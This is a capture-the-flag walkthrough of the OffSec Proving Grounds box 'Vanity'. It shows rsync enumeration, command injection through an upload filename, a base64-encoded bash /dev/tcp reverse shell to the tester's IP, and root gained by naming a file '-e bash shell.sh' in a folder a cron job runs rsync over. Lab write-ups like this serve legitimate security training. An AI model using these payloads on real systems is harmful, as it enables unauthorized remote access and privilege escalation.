Vanity Walkthrough- Proving Grounds OffSec
Vanity was a fun little box about a virus scanner called "Vanity." Intermediate box, it did require some thinking outside of the box to not only get in but for privilege escalation (priv esc) as well. I already had everything booted up and ready to go. Once I got the IP, I ran an nmap scan for all ports to see what ports were open on the host.
/nmap -p- 192.168.152.234 -o nmap.txt
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
873/tcp open rsync/
Then I ran another scan for versioning and scripts:
/nmap -sV -sC -p 22,80,873 192.168.152.234
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:
3072 62361a5cd3e37be170f8a3b31c4c2438 (RSA)
256 ee25fc236605c0c1ec47c6bb00c74f53 (ECDSA)
256 835c51ac32e53a217cf6c2cd936858d8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
http-title: Vanity Virus Scanner
http-server-header: Apache/2.4.41 (Ubuntu)
873/tcp open rsync (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux/I decided to check out the web server as it said there was "Vanity Virus Scanner".
This part took me quite a while. I tried uploading a PHP webshell for quite some time. I tried changing the magic numbers in the file, I tried changing the extensions. One extension that worked for me was .php5. I thought for sure that once I got that to upload, I’d have RCE (Remote Code Execution), but I was wrong. I went to where the file was located, and it simply downloaded the file instead of executing it. After this, I took a step back to look at other avenues. There was still another port open on 873, so I Googled "rsync port 873" and found this site.
http://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync/
This site gave me some enumeration tips and how to interact with rsync. I ran another nmap script scan but for rsync-list-modules to see if there were any modules available to list.
nmap -sV --script "rsync-list-modules" -p 873 192.168.152.234
I found that there were, in fact, two modules I could see. I then saw on the HackTricks website that I could list and even download files within the modules if I had access with no password. I tested "backup," but it needed a password. I then tested "source."
rsync -av --list-only rsync://192.168.152.234/sourceIt listed a few files and folders.
After I saw that I had access and could list these files, I tried to download them.
mkdir vanity
rsync -av rsync://192.168.152.234:873/source ./vanityI made a directory on my local machine called "vanity" to store the files into.
I wanted to look at the upload.php source code to see what was blocking my access when trying to upload a webshell.
I noticed that at the bottom, it called the system function. So instead of trying to bypass uploads and getting a webshell, I was going to try command injection with an upload. I loaded up Burp to intercept the request so that I could modify it to include command injection. I loaded a random test.txt file that I have and clicked upload. I used the ; to end the previous command and start the next one, which I used id to test.
After making my slight modification, I sent the request forward.
As you can see from the result, the command injection worked! We have RCE at this point, as shown by executing the "id" command. Now I needed to figure out how to run a reverse shell from here. This part took me a little bit of trial and error. Reading these walkthroughs, you would think this took me like 10 minutes from boot to root, but this part took me a few hours to figure out. I tried running just a command in quotes, without quotes, URL encoding, and then tried base64 encoding after reading some pages that were similar in attack. I tried using port 4444 as well with no luck but finally landed on a connection with port 443.
echo "bash -i >& /dev/tcp/192.168.45.156/443 0>&1" | base64
I set up a netcat listener on port 443, grabbed the base64 encoded payload, and modified another POST request.
nc -nvlp 443
#input this into the header
filename="test.txt; echo (encoded payload) | base64 -d | bash"
Finally! I caught a reverse shell!
I went ahead and snagged the local.txt flag.
Then I immediately went to the /tmp directory, grabbed and ran linpeas.sh from my Kali machine to see if I could find any priv esc vectors.
#On Kali Machine
python3 -m http.server 80
#On Target Machine
wget http://192.168.45.156/linpeas.sh
chmod +x linpeas.sh
./linpeas.shAfter letting it run and searching through the results, I discovered there was a bash script being run in crontab by root.
After seeing what the file did, I realized it was changing directories to the /var/www/html/uploads folder where we were able to write. Then it was executing an rsync command. This part took me quite a while as well! Since I was not too familiar with rsync, I ran the help page for it to see if I could somehow use a feature to gain priv esc.
The -e command executes a remote shell, much like how -e /bin/bash operates when running reverse shells. I must have passed by this option 20 times looking through the help page. But once I realized it was there, it made me remember a CTF I had done previously where I was able to leverage a command like this by naming the file itself "-e command". So I made a reverse bash shell into a .sh file.
echo "bash -i >& /dev/tcp/192.168.45.156/443 0>&1" > shell.sh
touch '/var/www/html/uploads/-e bash shell.sh'After making the shell.sh file, I used the touch command to create a file named -e bash shell.sh. So when rsync is run again in this folder, it’s going to see the file as a command rather than a file due to its name being a command that rsync recognizes.
I set up a netcat listener on port 443 and was able to get root!
This was a pretty challenging box, in my opinion. It made me read a ton of websites and articles to come up with ideas to try. I really enjoyed it though, as it also sparked memories of previous CTFs I’ve done with similar attack vectors. This is another reason why keeping notes is a must! Hope you enjoyed it, feel free to comment below if you have any questions or feedback.
-Sam
